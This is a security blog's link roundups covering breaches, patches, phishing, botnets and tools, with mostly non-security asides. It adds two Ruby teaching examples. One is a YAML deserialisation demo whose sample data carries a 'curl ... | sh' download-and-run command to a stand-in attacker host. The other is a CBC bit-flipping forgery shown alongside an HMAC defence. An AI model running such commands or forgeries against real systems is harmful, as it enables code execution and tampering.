un-excogitate.org
what was I thinking? (Christian Frichot’s ad-lib on security and what-not)

Security

Just some security things that I’ve found interesting (read: they rocked).

5 Minutes with the Packetloop Beta – The Packetloop presentation at Ruxcon last year was one of the highlights for me. Michael Baker did a really good job (even back in November) of demonstrating the use of compute clusters to analyse large data sets and give the defender a heads up. This video is a really good look at the UI and, yeah, it combines a bunch of stuff I enjoy, especially visualisation and large-data-set analysis. (Phew, got through that without saying cloud or big data!)

Android Application Assessment – A fairly extensive walkthrough of performing an app assessment against apps on Android. Nuff said.

Rubygems Site Recovers from Compromise – I’m a little slow in posting about this, but the community-driven rubygems site suffered a breach due to the Ruby YAML issues that surfaced a couple of weeks ago. Apart from the article, I found their incident response process interesting: they shifted their ‘working’ log to Google Docs (check it here).
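The class of bug behind that breach, as an added example (mine, not code from the rubygems post or the site’s own code): Ruby’s default YAML loader instantiates whatever object a `!ruby/object` tag names, so loading attacker-supplied metadata hands them an object of any class in the process. The `InstallHook` class and the document below are constructed for illustration; `YAML.safe_load` is the fix, with an explicit allow-list only where an application genuinely needs a class revived.

```ruby
require 'yaml'

# Hypothetical application class. Any class the loader may instantiate
# becomes attacker-controlled once the document is untrusted.
class InstallHook
  attr_accessor :command
end

# Constructed sample document (not a real payload from the incident).
UNTRUSTED_DOC = <<~YAML
  --- !ruby/object:InstallHook
  command: "curl http://attacker.invalid/x | sh"
YAML

# How most 2013-era code loaded gem metadata: full object deserialisation.
# Psych 4 made YAML.load safe by default, so use unsafe_load where it exists
# and fall back to the old (already unsafe) YAML.load otherwise.
def load_unsafely(doc)
  if YAML.respond_to?(:unsafe_load)
    YAML.unsafe_load(doc)
  else
    YAML.load(doc)
  end
end

# The fix: only scalars, arrays and hashes unless a class is explicitly permitted.
def load_safely(doc, permitted: [])
  YAML.safe_load(doc, permitted_classes: permitted)
end

# Returns :blocked if safe_load refuses the tagged object, :unexpected otherwise.
def safe_load_outcome(doc)
  load_safely(doc)
  :unexpected
rescue Psych::DisallowedClass
  :blocked
end
```

`load_unsafely(UNTRUSTED_DOC)` yields a live `InstallHook` whose `command` is attacker-chosen, while `safe_load_outcome(UNTRUSTED_DOC)` returns `:blocked`; passing `permitted: [InstallHook]` re-enables exactly that one class and nothing else.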

How do I phish? – @Zeknox (Brandon McCann) writes up a fairly in-depth look at how he performs phishing campaigns as part of penetration testing engagements. A good one to bookmark for when you need to perform these sorts of assessments yourself. (Thanks again to Rob Fuller for this.)

Bill Shocker – hits 600,000+ Android phones! (Exclamation points.) (In China only?) From what the article seems to be saying, this malware turns the phones into a botnet, although currently it appears to be using them to send SMS messages for the attackers’ profit.

Non-Security

… and then a bunch more non-security stuff …

It’s All Academic – Andy Budd writes up a great article on the disconnect between academia and those working in the web industry. The ‘paraphrased’ conversation is great, and something I found very odd when I shifted from academia into the industry.

The larger our past gets the smaller our present feels – A great short film that Kottke posted the other day. Great style, and an interesting message about time and our perception of it as we age. This is certainly something I’m starting to perceive as I get older, and things get more and more difficult.

Valve & JJ Abrams Working on a Movie – I’m a gamer, well, when I have time (which, this year is looking very unlikely), and this news is fairly interesting .. but .. the cynic in me is sort of assuming it’s just gonna suck.

Mockumentary on Physically Unlikely Amusement Park Rides – .. this .. this was fantastic. I really enjoyed the style, the scientist, the ridiculous rides, and how it starts off ‘almost’ realistic but then just plummets into the ‘wtf’. It sort of made me think of Cube.



Security articles I flagged (for fun or .. whatnot):

Are You Practicing Safe Coding? – Personally I have a love/hate relationship with this style of infographic; this one in particular is almost like a flattened marketing slide deck. Eh. Anyway, this image does hold a lot of stats in a single place, and has a fairly open call to action to check out the rest of Veracode’s stuff. (Oh, and don’t forget that infographics are ruining the web.)

HowTo: Extract ‘hidden’ API-hooking BHO DLLs – Ever had a chance to play with Volatility? If you haven’t, definitely check it out; it’s a great way to analyse volatile memory. This tutorial walks through finding a malicious Browser Helper Object hooked into IE to perform some nasty man-in-the-browser (MitB) stuff.

Turn a Bra Underwire into a Lock Pick – Need I say more? This is a security article AND an awesome party trick!

10 Evil User Tricks for Bypassing AV – Thanks to @mubix‘s #sharedlinks.

Cross Device Attacks using Cloud Sync (iCloud example) – Nitesh writes up another Apple-esque security article. This time he looks at how, whilst iOS is generally considered a secure platform, introducing syncing applications introduces a weaker link in the chain, namely a desktop computer. This is compounded when you use syncing applications for business processes, which are then also synced to your crappy, out-of-date home PC. All this and more! (Read the article, ya slackers.)

Hacker Blackmailed 350 Women into Stripping on their Webcams – .. Social engineering .. what can’t it do?

Security flaws in UPnP – millions at risk – When the Rapid7 (R7) guys aren’t making Metasploit kick ass, they do security research. This is unlikely to be the first time you’ve heard about this issue, as it’s done the rounds lately. I’m aware they offer some self-test tools now too if you want to check whether you’re vulnerable.

.. The rest of these are not so security focused (but .. sort of..).

Awesome secret drawer – Watch the embedded Vimeo – this wooden chest with the hidden drawer is fantastic.

Poor Sleep Prevents Brain from Storing Memories – I have a pretty shocking memory. Sometimes I don’t sleep too well. I’m not really convinced that in my case these issues are related.. but interesting research regardless.

Eddie Adams’ Pulitzer Winning Image – This well-known (and super powerful) photo was taken in Vietnam on February 1st, 1968. There aren’t many art forms where the power of your creation is something which even you, as the creator, can’t bear to face. Interesting insight into the image and the impact it had on society and on the photographer.

MS embracing (Open Source) Git – I found the MS article provided a much clearer picture of their intent and their approach to open source software, especially compared to the original article.



Written to the sweet, relaxing sounds of the new Villagers album, Awayland (for those indie fans). I know I’m a bit late on my ‘attempt to post every Friday’ thing, but Friday turned into a bit of a clusterfudge, so excuse the delay (plus, Australia Day over the weekend <insert drinks>).

Security articles that caught my attention:

Actually, I really was a criminal.. – I found Rich’s post really insightful and refreshing. I also think it’s fairly common for those involved in the infosec space to have done similar things themselves, just not as common for those people to publicly post about it. Kudos.

Android Botnet Infects 1 Million Plus Phones – I didn’t read too much into the ‘extremist’ title of this post, but I don’t think this sort of thing should be too surprising to security peeps. Phones are just computers, right? And as they continue to grow in popularity and drop in price, of course malicious actors are going to focus their attention on them. I know a personal interest of mine is using BeEF to target mobile devices; in this way you could effectively coerce an untold number of devices to perform actions on your behalf just through their browser.

Pen tester launches infosec bootcamp – I’m glad to have worked with, and hung out with, Snyff on a few occasions, and I’ve gotten a lot out of his PentesterLab for quite some time, so now that he’s making a move to make more of this material available, that can only be a good thing. Another of Snyff’s ‘free’ services is the PNTSTR Bot. His bot sends me a ‘pen tester’ question once a week via DM. It’s a great little ‘test yourself’ activity that takes less than 30 seconds, and I look forward to the challenge every week.

Movie filmed entirely in Disney Theme park – Not strictly a digital security post, but I certainly found the concept really interesting. The crew and actors pretty much had to ‘stealth’ film the movie, referring to mobile phones for notes and scripts and using camera setups as discreet as possible. I hope this inspires more of these sorts of things.

Application Framework Security – Jerry Hoff over at OWASP has started a new project to document the security controls available in common development frameworks. It’s a good reference (if just at the beginning), and hopefully it can be extended to integrate and interlink with other OWASP projects like the Top 10, ASVS, etc.

Some tech/dev stuff:

Visual Event – for when you need to dig into JS events. Hat tips to Vitaly for the link.

LICEcap – for when you need to capture a portion of your screen and immediately convert it into an animated GIF. .. obviously for .. you know .. legitimate reasons.

MS Going its own way on Audio/Video spec – .. god damnit WHY does this shit happen? Just when you think browsers are starting to all meet at an apex of compatibility *bam* – we’re going to do our own thing. I really dislike IE, mainly because of the experience and bloat of it, but, there’s all this underlying gumpf that, when I think about it, also grinds my gears. (Goes back to rocking backwards and forwards on his angry man chair).

Firefox Phone – I’ve seen a few presentations on Boot to Gecko (B2G) / Firefox OS over the past 12 months, primarily at OWASP events. I’ve been interested in the ‘everything is a web app’ phone (a little bit like Chrome OS), except in this case everything is HTML and JS. Obviously from a BeEF point of view I was salivating, but as a new player in the space I’m also keen to see how it goes. Plus, obviously, it’s completely customisable.

Motivational / inspirational (?):

Putting Things Into Perspective: Space – I was enthralled by the entire 19-minute Vimeo, and it was one of those moments (that you may not experience that often) when you realise just how small we all are, and how profound it must be to a) see the entire earth beneath you and b) see the sun surrounded by the darkness of space, as opposed to the blue sky we normally associate with it.



First off the bat are a couple of posts that I’ve had direct (some would say intimate) involvement in.

BeEF QR Fun – Summarising some of the salient points from my OWASP AppSecAPAC 2012 presentation (Shake Hooves with BeEF), I finally pulled my finger out and posted to the BeEF blog. Mainly focusing on custom mount points in BeEF with iframe target-site impersonation, plus a dabbling of QR codes, the post demonstrates a few different ways to fit BeEF into your social engineering methodology.

Anonymous Post-Compromise Control via Tor Hidden Services – My colleague Dave somehow managed, over the Christmas period, to wrangle up an opus on utilising Tor to anonymise backdoor connectivity to compromised hosts. Knowing Dave’s relationship with beer, I’m surprised he still had the brain power to push this out (:P). If you have any interest in Metasploit and Tor then you should check out his post.

And now onto other security stuff..

Minion – Automating Security for Developers – There are a few different open source security automation projects going on at the moment (I mentioned Codesake recently), but this one looks pretty interesting. It seems to be fairly modular (currently it appears to interface with ZAP, Skipfish and Garmr). The demo video seems really interesting, very point and click. For developers, this may be an ideal ‘step’ in their SDLC to catch bugs sooner.

Red October – There’s been quite a bit of noise about this attack recently. This was one of the first blog posts I read that seemed to provide a clear summary, with further links into the Kaspersky reports. This long-term campaign has apparently been targeting embassies and other government agencies (including defence) for the past five years.

Non-Negotiable Elements of a Secure Software Development Process: Part 2 – Nick Coblentz has been posting these great articles on the elements of a secure systems or software development lifecycle which are non-negotiable. Part 1 started with security requirements, while this post focuses on security architecture, configuration and other patterns. If you’re working on embedding security into your development lifecycle, definitely keep in the loop on Nick’s posts.

Man-in-the-Middle Attacks Against Browser Encryption – Schneier recently posted a summary of how Nokia is intercepting HTTPS traffic (decrypting it on its own proxy servers) to offer better data transmission speeds over slower networks through compression and other means. This is really similar to a 2009 post of mine about how Opera Mini was doing the same thing.

Defeating AES Without a PhD – Dan Crowley writes up an excellent post on leveraging some of Burp’s trickier Intruder settings to understand (and attack) encrypted parameters within web apps. (Dan’s a great guy; I was happy to have a few beers with him while he was down in Sydney last year.)
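As an added example (mine, not code from Dan’s post, and in Ruby rather than Burp) of one attack such parameters are open to when the ciphertext carries no integrity check: CBC bit-flipping, where XORing bytes of the IV rewrites the first plaintext block without ever knowing the key. The parameter format, the key handling and the HMAC fix are assumptions made for the demo; nothing here is a real application’s code.

```ruby
require 'openssl'
require 'securerandom'

# Secrets the hypothetical server holds; the attacker never sees them.
ENC_KEY = SecureRandom.random_bytes(16)
MAC_KEY = SecureRandom.random_bytes(32)
BLOCK   = 16

# Vulnerable server side: AES-128-CBC, random IV, no integrity check.
# Blob layout: iv || ciphertext.
def encrypt_param(plain)
  c = OpenSSL::Cipher.new('aes-128-cbc').encrypt
  c.key = ENC_KEY
  iv = SecureRandom.random_bytes(BLOCK)
  c.iv = iv
  iv + c.update(plain) + c.final
end

def decrypt_param(blob)
  iv, ct = blob[0, BLOCK], blob[BLOCK..-1]
  c = OpenSSL::Cipher.new('aes-128-cbc').decrypt
  c.key = ENC_KEY
  c.iv = iv
  c.update(ct) + c.final
end

# Attacker side. CBC recovers block n as D(C_n) XOR C_(n-1), and for the
# first block C_0 is the IV, which the attacker controls. Knowing (or guessing)
# the plaintext bytes at a position lets them XOR the IV so those bytes decrypt
# to any value of the same length. Only the first block is touched, so the rest
# of the message, including its padding, stays intact.
def flip_first_block(blob, known, wanted)
  unless known.bytesize == wanted.bytesize && wanted.bytesize <= BLOCK
    raise ArgumentError, 'known and wanted must be equal length and fit in one block'
  end
  out = blob.dup
  known.bytes.zip(wanted.bytes).each_with_index do |(k, w), i|
    out.setbyte(i, blob.getbyte(i) ^ k ^ w)
  end
  out
end

# Hardened server side: same encryption plus an HMAC over iv || ciphertext,
# verified in constant time before anything is decrypted.
def constant_time_equal?(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).reduce(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

def encrypt_param_authenticated(plain)
  blob = encrypt_param(plain)
  blob + OpenSSL::HMAC.digest('SHA256', MAC_KEY, blob)
end

def decrypt_param_authenticated(blob)
  body, tag = blob[0...-32], blob[-32..-1]
  return nil unless constant_time_equal?(OpenSSL::HMAC.digest('SHA256', MAC_KEY, body), tag)
  decrypt_param(body)
end

# Runs the forgery against both versions using a constructed parameter value.
def demo
  original = 'role=user;id=1234'
  forged   = flip_first_block(encrypt_param(original), 'role=user', 'role=root')
  tampered = decrypt_param(forged)          # the unauthenticated server accepts it

  auth_forged = flip_first_block(encrypt_param_authenticated(original), 'role=user', 'role=root')
  { tampered: tampered, authenticated_result: decrypt_param_authenticated(auth_forged) }
end
```

`demo` returns `role=root;id=1234` for the unauthenticated variant and `nil` for the HMAC-protected one; in Burp the same flip is what the Intruder bit-flipper payload automates, one bit at a time, so you can watch which positions change the application’s behaviour. The lesson is that encryption alone gives confidentiality, not integrity; anything the client can hand back needs a MAC (or an AEAD mode) checked before decryption.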

Bouncer’s Laser Precision Phishing – RSA has posted an article on a particular phishing kit (i.e. a pre-canned tool used to build or deploy phishing sites) which uses a unique URL for each recipient (so this kit includes the email/spam component too) to ensure the site is only accessible (at least initially) to the intended victim. I’m sure there are ways to bypass this, but it may certainly fool some simple phishing detection tools (such as those used by finance and other sectors when they analyse abuse mailboxes or email bounce-backs).

Okay, enough with the security stuff .. (Fine! .. here’s one article..)

Monkey Island Insult Swordfighter in your Browser – For those fans of the original Monkey Island point-and-click adventure games, you should check this out! This guy has dumped a collection of the sword-fighting challenges into browser form..



Pretty hectic week, what with Rails getting an absolute slam, Java 0-days and CES going on. If you’ve been bored on the Internet, you’ve been doing it wrong.

AWS Improvements – So my IaaS of choice is primarily Amazon, and it’s no surprise that they’ve had some updates since the start of the year. In fact, they seem to be posting about updates on an almost weekly basis. This update, whilst primarily aesthetic, brought with it a new Android app. I’ve only had a brief play with it, but it certainly gives basic portable access to managing your virtual machines. In addition, AWS also updated CloudWatch to allow automatic stopping of idle machines. I’ve been hacking together some stuff to perform this same task, so it’s useful to see that they’re providing it natively. Another reason to shift from Heroku to Amazon.

The Value of Concentration in the Digital Age – I originally saw this article on Lifehacker, and found that a lot of the issues discussed felt very familiar. Whilst the post primarily focuses on the impacts of a lack of concentration, and how traditional books can help with this (you can’t click buttons on a book), the commentary around the associated anxiety is something I certainly agree with. I’ve struggled on and off with anxiety for a while now and certainly put a high value on ‘relaxing’ and ‘unwinding’ to help manage this. Books are a great source of relaxation for me, and this article certainly confirmed for me the benefits of using a fairly dumb e-reader (the most basic Kindle) as opposed to something like an iPad. The Kindle does one thing, and does it well.

Colour Affects Perceptions of Taste – From the design hive-mind of Core77, a quick summary of some research performed by the Society of Sensory Professionals on how the colour of a container affects taste. For all the clever shit we, as humans, think we’re capable of, there’s certainly a whole bunch of unknowns within our minds.

The Dronenet – but instead of being used for evil, we’re actually going to use these little critters for good. Who would’ve thought? Apart from really enjoying the vids of the quadrocopters bouncing balls, and being horrified by all the invasion-of-privacy stories coming out, there’s not too much *positive* stuff that comes out around drones. I found this idea somewhat refreshing. .. As an aside, I’m obviously in the wrong circles, as mostly when I read about drones it’s negative, when of course there are in fact a lot of benefits to this sort of tech too.

The Pixel Trade – Really interesting photography project whereby the author is travelling the globe trading his photography skills for accommodation, food, travel etc. I’m quite glad that this sort of exercise is being done by people, and I sort of wish I could convert what I do into a similar process… Anyone want to fly me around and hook me up with a couch in exchange for security services? People keep on saying I have Penetration Testing skills on LinkedIn .. surely someone finds those skills useful?

Onto the security stuff:

Patch your Rails stuff – The R7 guys have been posting a lot about this issue, which is pretty darn wide-reaching. Just read their posts, and if you’re not following them on Twitter/RSS, get onto it.

Patch your Java – This is being actively exploited in the wild, and if it’s not in MSF now, it will be shortly.

Realtime iOS Filesystem Monitoring – @Jhaddix has been posting some really good iOS stuff over the past few days. If you don’t follow his blog or Twitter, get onto it. (He just posted Defeating iOS Jailbreak Detection too!)

Q1 Security Projects – Daniel Kennedy over at 451 Research posted some pretty graphs showing the various states of security projects across a subset of organisations. I haven’t really looked too closely at the data sources or the rigour within, but it might be a quick and easy way for you to gauge where you’re at with your projects compared to ‘some’ sectors.

ENISA BYOD Guide – I won’t really add much to what @rmogull wrote, but if you’re at all working on BYOD in your company, this is a pretty good set of information for you.


